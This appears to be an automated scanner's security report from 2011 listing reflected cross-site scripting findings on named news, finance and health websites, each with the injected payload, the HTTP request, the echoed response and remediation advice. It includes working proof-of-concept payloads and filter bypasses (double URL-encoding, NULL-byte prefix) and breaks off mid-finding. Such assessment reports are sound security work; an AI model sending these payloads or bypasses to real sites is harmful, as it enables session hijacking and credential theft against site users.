Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-822287727-1304575116403; is_aol_user=1; huffpost_adssale=n; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; huffpo_type_views=%7B%2215%22%3A1%7D; s_pers=%20s_getnr%3D1304575172633-New%7C1367647172633%3B%20s_nrgvo%3DNew%7C1367647172635%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utma=265287574.457433518.1304575105.1304575105.1304575105.1; __utmc=265287574; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __utmb=265287574.10.10.1304575105; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Thu, 05 May 2011 01:30:40 GMT
Connection: close
Content-Length: 6018

       <div id="857597" class="grid third flush_top threeup_entries">
           <div id="entry_857597" class="entry no_border">
               <div class="image_wrapper"><a href="http://www.huffingtonpost.com/2011/05/04/cnn-poll-finds-that-most-_n_857597.html?ir=World" target="_top" onclick="HPTrack.trackPageview('/t/a/threeup.v2/World');">            <img src="http://i.huffpost.com/gen/273847/thumbs/r-BIN-LADEN-medium260.jpg" border="0" width="260" height="75" alt="" />        </a></div>
               <h5><a href="http://www.huffingtonpost.com/2011/05/04/cnn-poll-finds-that-most-_n_857597.html?ir=World" class="threeup_titles block margin_0_20" target="_top" onclick="HPTrack.trackPageview('/t/a/threeup.v2/World');">CNN Poll Finds That Most People Think Bin Laden Is In Hell</a></h5>
           </div>
       </div>        <div id="entry_threeup_central" class="grid third flush_top threeup_entries">
           <div id="entry_threeup_central_inner" class="entry no_border world">
               <div class="image_wrapper">                    <a href="/world/" target="_top" onclick="HPTrack.trackPageview('/t/a/threeup.v2/World');"><img src="http://i.huffpost.com/gen/273918/thumbs/s-LIBYA-INTERNATIONAL-AID-97x75.jpg" border=0 width=97 height=75 style="display:inline" /></a>                    <a href="/world/" target="_top" onclick="HPTrack.trackPageview('/t/a/threeup.v2/World');"><img src="http://i.huffpost.com/gen/273951/thumbs/s-OSAMA-BIN-LADEN-PHOTOS-97x75.jpg" border=0 width=97 height=75 style="display:inline" /></a>                    <a href="/world/" target="_top" onclick="HPTrack.trackPageview('/t/a/threeup.v2/World');"><img src="http://i.huffpost.com/gen/273798/thumbs/s-AFGHANISTAN-PAKISTAN-BIN-LADEN-97x75.jpg" border=0 width=97 height=75 style="display:inline" /></a>                </div>
               <h5><a href="/world/" target="_top">More In World:</a> <a href="/world/" target="_top" class="threeup_titles" onclick="HPTrack.trackPageview('/t/a/threeup.v2/World');">                    Libya Targets Aid Arrival...                    Bin Laden Raid Photos...                    Pakistan Had To Know?...                    </a>
               </h5>
           </div>
       </div>        <div id="857624" clas
...[SNIP]...

2. Cross-site scripting (reflected)  previous  next
There are 55 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


2.1. http://www.aolnews.com/category/goodnews/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.aolnews.com
Path:   /category/goodnews/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c033e"%3bf7c25182fc9 was submitted in the REST URL parameter 2. This input was echoed as c033e";f7c25182fc9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /category/goodnewsc033e"%3bf7c25182fc9/ HTTP/1.1
Host: www.aolnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:56:20 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; expires=Thu, 05-May-2011 11:56:20 GMT; path=/
Keep-Alive: timeout=5, max=999999
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 86979

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h
...[SNIP]...
channel="us.news";
s_265.pageType="";
s_265.linkInternalFilters="javascript:,aolnews.com";
s_265.mmxgo = true;
s_265.prop1="";
s_265.prop2="main";
s_265.prop12="http://www.aolnews.com/category/goodnewsc033e";f7c25182fc9/";
s_265.prop18="goodnewsc033e\";f7c25182fc9";
s_265.prop19="";
s_265.prop20="";

var s_code=s_265.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

2.2. http://www.bankrate.com/funnel/mortgages/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bankrate.com
Path:   /funnel/mortgages/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7abf6"style%3d"x%3aexpression(alert(1))"ef43b8923ec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7abf6"style="x:expression(alert(1))"ef43b8923ec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /funnel/mortgages/?7abf6"style%3d"x%3aexpression(alert(1))"ef43b8923ec=1 HTTP/1.1
Host: www.bankrate.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Servername: a-brmweb03
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 1.7.0
Content-Type: text/html; charset=utf-8
Expires: Thu, 05 May 2011 10:56:22 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Thu, 05 May 2011 10:56:22 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 46805


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link type="text/css"
...[SNIP]...
<link rel="canonical" href="http://www.bankrate.com/funnel/mortgages/?7abf6"style="x:expression(alert(1))"ef43b8923ec=1" />
...[SNIP]...

2.3. http://www.citysbest.com/ [icid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.citysbest.com
Path:   /

Issue detail

The value of the icid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89199"><script>alert(1)</script>cd5f8e88860 was submitted in the icid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?icid=navbar_citysbest_main589199"><script>alert(1)</script>cd5f8e88860 HTTP/1.1
Host: www.citysbest.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:58:46 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; expires=Thu, 05-May-2011 01:58:46 GMT; path=/
Content-Type: text/html
Content-Length: 15674

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap
...[SNIP]...
<meta property="og:url" content="http://www.citysbest.com/?icid=navbar_citysbest_main589199"><script>alert(1)</script>cd5f8e88860"/>
...[SNIP]...

2.4. http://www.citysbest.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.citysbest.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f2e5"><script>alert(1)</script>6009f09c189 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?icid=navbar_citysbest_main5&9f2e5"><script>alert(1)</script>6009f09c189=1 HTTP/1.1
Host: www.citysbest.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:59:05 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; expires=Thu, 05-May-2011 01:59:05 GMT; path=/
Content-Type: text/html
Content-Length: 15691

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap
...[SNIP]...
<meta property="og:url" content="http://www.citysbest.com/?icid=navbar_citysbest_main5&9f2e5"><script>alert(1)</script>6009f09c189=1"/>
...[SNIP]...

2.5. http://www.citysbest.com/traffic/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.citysbest.com
Path:   /traffic/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f3384%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0ccc1ec0bf6 was submitted in the REST URL parameter 1. This input was echoed as f3384</script><script>alert(1)</script>0ccc1ec0bf6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /trafficf3384%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0ccc1ec0bf6/?t=js&bv=&os=&tz=&lg=&rv=&rsv=&pw=%2F%3Ficid%3Dnavbar_citysbest_main5%2F&cb=76544643 HTTP/1.1
Host: www.citysbest.com
Proxy-Connection: keep-alive
Referer: http://www.citysbest.com/?icid=navbar_citysbest_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_getnr%3D1304575100835-New%7C1367647100835%3B%20s_nrgvo%3DNew%7C1367647100836%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:59:57 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; expires=Thu, 05-May-2011 01:59:57 GMT; path=/
Content-Type: text/html
Content-Length: 17861

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap
...[SNIP]...
5.pfxID="acg";
s_265.pageName=s_265.pfxID+" : "+pageName;
s_265.channel="us.citybest";
s_265.linkInternalFilters="javascript:,citysbest.com";

var isCity = "";
s_265.prop1= isCity !='' ? "trafficf3384</script><script>alert(1)</script>0ccc1ec0bf6" : "national";

var isUrl2 = "";
s_265.prop2= isUrl2 != ''? "" :"main";

s_265.prop12=document.URL.split('?')[0];
s_265.events="";
s_265.products="";
//s_265.purchaseID=Math.ceil(Math.random()
...[SNIP]...

2.6. http://www.citysbest.com/traffic/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.citysbest.com
Path:   /traffic/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0958"><script>alert(1)</script>e2e8451909c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /trafficd0958"><script>alert(1)</script>e2e8451909c/?t=js&bv=&os=&tz=&lg=&rv=&rsv=&pw=%2F%3Ficid%3Dnavbar_citysbest_main5%2F&cb=76544643 HTTP/1.1
Host: www.citysbest.com
Proxy-Connection: keep-alive
Referer: http://www.citysbest.com/?icid=navbar_citysbest_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_getnr%3D1304575100835-New%7C1367647100835%3B%20s_nrgvo%3DNew%7C1367647100836%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:59:35 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; expires=Thu, 05-May-2011 01:59:36 GMT; path=/
Content-Type: text/html
Content-Length: 17532

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap
...[SNIP]...
<meta property="og:url" content="http://www.citysbest.com/trafficd0958"><script>alert(1)</script>e2e8451909c/?t=js&bv=&os=&tz=&lg=&rv=&rsv=&pw=%2F%3Ficid%3Dnavbar_citysbest_main5%2F&cb=76544643"/>
...[SNIP]...

2.7. http://www.dailyfinance.com/markets/mostactives [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.dailyfinance.com
Path:   /markets/mostactives

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b7010'%3b71e04f33930 was submitted in the REST URL parameter 2. This input was echoed as b7010';71e04f33930 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /markets/mostactivesb7010'%3b71e04f33930 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: GEO-173_193_214_243_64_12_173_49=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; AOL_StockQuotesLiveUpdate=1; s_pers=%20s_getnr%3D1304575093082-New%7C1367647093082%3B%20s_nrgvo%3DNew%7C1367647093084%3B; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.95b2; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.95b2;

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:56:34 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: IPHONE_MESSAGE=2; Expires=Wed, 03-Aug-2011 10:56:34 GMT; Path=/
Set-Cookie: IPHONE_MESSAGE=2; Expires=Wed, 03-Aug-2011 10:56:34 GMT; Path=/
Content-Language: en
Content-Length: 68717
Keep-Alive: timeout=5, max=999
Connection: Keep-Alive
Content-Type: text/html;charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Market Movers:</titl
...[SNIP]...
<!--
var relegenceTopics='MOSTACTIVESB7010';71E04F33930';
var RTN_SNIPPET_SIZE = '300';
var RTN_HOVER_TIMEOUT = '16000';
// -->
...[SNIP]...

2.8. http://www.everydayhealth.com/allergy/climate-change-and-allergies.aspx [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.everydayhealth.com
Path:   /allergy/climate-change-and-allergies.aspx

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fc36d'%3bf5e1aa920da was submitted in the REST URL parameter 2. This input was echoed as fc36d';f5e1aa920da in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /allergy/climate-change-and-allergies.aspxfc36d'%3bf5e1aa920da HTTP/1.1
Host: www.everydayhealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 File Not Found
Connection: close
Date: Thu, 05 May 2011 10:56:35 GMT
Server: Microsoft-IIS/6.0
ServerID: : USNJWWEB11
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=AcxBpPBurMtkMjIxMTI2NS01ODVmLTQwMjYtOTNhZi1lZDQyOGE5ZWU2Y2E1; expires=Wed, 13-Jul-2011 21:36:35 GMT; path=/
Set-Cookie: ASP.NET_SessionId=dbvjd455jngipsngirkccraw; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 16443


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<script> COMSCORE.beacon({ c1: 2, c2: '6035818', c3: '', c4: 'www.everydayhealth.com/allergy/climate-change-and-allergies.aspxfc36d';f5e1aa920da', c5: '', c6: '', c15: ''});</script>
...[SNIP]...

2.9. http://www.everydayhealth.com/allergy/climate-change-and-allergies.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.everydayhealth.com
Path:   /allergy/climate-change-and-allergies.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00c6e76"><script>alert(1)</script>76c82397b8f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c6e76"><script>alert(1)</script>76c82397b8f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /allergy/climate-change-and-allergies.aspx?%00c6e76"><script>alert(1)</script>76c82397b8f=1 HTTP/1.1
Host: www.everydayhealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 10:56:34 GMT
Server: Microsoft-IIS/6.0
ServerID: : USNJWWEB11
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=AcxBpO*ri-NiNTMxMWZkZS04NTY4LTRiYjEtODAwOC0xN2Q0NzQ1YTM0NGQ1; expires=Wed, 13-Jul-2011 21:36:34 GMT; path=/
Set-Cookie: ASP.NET_SessionId=c5cfbq55mbxvfz55feiauhef; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 49343


<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">

<head id="head"><title>
   Can Climate Change Cause Allergy? - Allergy Center - Every
...[SNIP]...
<meta property="og:url" runat="server" id="fburl" content="http://www.everydayhealth.com/allergy/climate-change-and-allergies.aspx?%00c6e76"><script>alert(1)</script>76c82397b8f=1" />
...[SNIP]...

2.10. http://www.everydayhealth.com/heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.everydayhealth.com
Path:   /heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8ac7e'%3b98481e38035 was submitted in the REST URL parameter 3. This input was echoed as 8ac7e';98481e38035 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx8ac7e'%3b98481e38035 HTTP/1.1
Host: www.everydayhealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 File Not Found
Connection: close
Date: Thu, 05 May 2011 10:56:36 GMT
Server: Microsoft-IIS/6.0
ServerID: : USNJWWEB11
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=AcxBpPFHohNiNzhlZWI5Mi02YzQyLTQyMWMtOWExZS1iZWJlZjRmYjg5ZTU1; expires=Wed, 13-Jul-2011 21:36:36 GMT; path=/
Set-Cookie: ASP.NET_SessionId=hxo2de55iuwcrdvelxqosn55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 16547


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<script> COMSCORE.beacon({ c1: 2, c2: '6035818', c3: '', c4: 'www.everydayhealth.com/heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx8ac7e';98481e38035', c5: '', c6: '', c15: ''});</script>
...[SNIP]...

2.11. http://www.everydayhealth.com/heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.everydayhealth.com
Path:   /heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %004b806"><script>alert(1)</script>8759e8fbd80 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4b806"><script>alert(1)</script>8759e8fbd80 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx?%004b806"><script>alert(1)</script>8759e8fbd80=1 HTTP/1.1
Host: www.everydayhealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 10:56:35 GMT
Server: Microsoft-IIS/6.0
ServerID: : USNJWWEB11
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=AcxBpPB*XTNmOWRkZmU1ZS0xODQ2LTQ1ZTAtYWNlYS0xY2FjNmI1YzNlZDI1; expires=Wed, 13-Jul-2011 21:36:35 GMT; path=/
Set-Cookie: ASP.NET_SessionId=k0j5vvz5mxglzzntqc5yh03h; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 49861


<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">

<head id="head"><title>
   Is Cholesterol Treatment Worth It? - EverydayHealth.com
<
...[SNIP]...
<meta property="og:url" runat="server" id="fburl" content="http://www.everydayhealth.com/heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx?%004b806"><script>alert(1)</script>8759e8fbd80=1" />
...[SNIP]...

2.12. http://www.everydayhealth.com/kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspx [REST URL parameter 3]  previous  next

Summary

